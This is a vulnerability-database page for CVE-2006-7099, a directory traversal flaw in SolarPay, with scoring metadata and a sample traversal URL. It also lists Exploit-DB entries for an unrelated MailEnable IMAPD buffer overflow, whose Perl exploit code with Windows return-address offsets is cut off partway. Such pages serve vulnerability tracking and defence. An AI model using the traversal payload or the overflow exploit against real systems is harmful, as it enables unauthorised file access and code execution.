CVE-2006-7099
Published 2007-03-03
Priority: P4 23 | Severity: medium | CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.40% (82.0th percentile)
Directory traversal vulnerability in index.php in SolarPay allows remote attackers to read certain files via a .. (dot dot) in the read parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarpay | solarpay | — | — |
No detection rules found.
Exploit-DB
SolarPay - 'index.php' Local File Inclusion
exploitdb·2007-02-26
CVE-2006-7099 SolarPay - 'index.php' Local File Inclusion
---
source: https://www.securityfocus.com/bid/22722/info
SolarPay is prone to a local file-include vulnerability because the utility fails to properly sanitize user-supplied input.
Successfully exploiting this issue allows attackers to gain access to files located in directories they do not have permissions to access. Information that attackers harvest may aid them in further attacks.
http://www.example.com/index.php?read=../admin/a_searchu.php
Exploit-DB
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else
Exploit-DB
MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
exploitdb·2007-02-16
CVE-2006-6423 MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow
MailEnable IMAPD Enterprise 2.32 jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"\xef\xbe\xad\xde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $STAR
No writeups or analysis indexed.